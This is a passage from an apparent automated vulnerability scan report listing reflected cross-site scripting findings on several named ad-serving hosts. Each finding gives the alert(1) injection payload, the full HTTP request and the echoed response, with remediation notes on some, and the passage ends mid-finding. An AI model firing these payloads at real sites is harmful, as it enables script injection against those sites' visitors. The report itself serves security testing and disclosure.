Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f47e8'-alert(1)-'64ed47f711b&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x600%26section%3D429613f47e8%27-alert%281%29-%2764ed47f711b">
...[SNIP]...

1.30. http://ad.harrenmedianetwork.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613f92b8"><script>alert(1)</script>05d28b2545d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&s=429613f92b8"><script>alert(1)</script>05d28b2545d&t=2" target="parent">
...[SNIP]...

1.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.reduxmedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=120x600&section=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1
Host: ad.reduxmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:18:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT
Pragma: no-cache
Content-Length: 4638
Age: 0
Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

1.32. http://ad.scanmedios.com/imp [Z parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 402
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250b9973'-alert(1)-'b683290dc0&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250b9973%27-alert%281%29-%27b683290dc0%26s%3D601669%26_salt%3D1358407199%26B%3D10%
...[SNIP]...

1.33. http://ad.scanmedios.com/imp [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 404
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669abe80'-alert(1)-'f0f512ee374&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D601669abe80%27-alert%281%29-%27f0f512ee374%26_salt%3D1358407199%26B%3D10%26u%3Dhttp%253A
...[SNIP]...

1.34. http://ad.scanmedios.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250dce2d'-alert(1)-'7ba8e3efc79&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250dce2d%27-alert%281%29-%277ba8e3efc79%26section%3D601669">
...[SNIP]...

1.35. http://ad.scanmedios.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250a927c"><script>alert(1)</script>8783e6815d8&inv_code=601669&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250a927c"><script>alert(1)</script>8783e6815d8&s=601669&t=2" target="parent">
...[SNIP]...

1.36. http://ad.scanmedios.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 711
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669a9583"><script>alert(1)</script>2bc6827f86d&redir=h
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=601669a9583"><script>alert(1)</script>2bc6827f86d&t=2" target="parent">
...[SNIP]...

1.37. http://ad.scanmedios.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.scanmedios.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f734e'-alert(1)-'2b959f792a9 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669f734e'-alert(1)-'2b959f792a9 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 641
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&inv_code=601669f734e'-alert(1)-'2b959f792a9&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D601669f734e%27-alert%281%29-%272b959f792a9">
...[SNIP]...

1.38. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219c9'-alert(1)-'d6a336d9756 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:49 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683569:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:49 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 848

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640219c9'-alert(1)-'d6a336d9756&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

1.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ad93'-alert(1)-'3d320c11be8 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:40 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:34426:1296683560:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:40 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!4ad93'-alert(1)-'3d320c11be8&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return
...[SNIP]...

1.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58c87'-alert(1)-'b77056dfb54 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:17 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683597:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=67123915558c87'-alert(1)-'b77056dfb54&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

1.41. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41b1e'-alert(1)-'97331fa72cc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:35 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683615:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:35 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad41b1e'-alert(1)-'97331fa72cc';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

1.42. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec678'-alert(1)-'8c695f1ae57 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:26 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683606:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:26 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

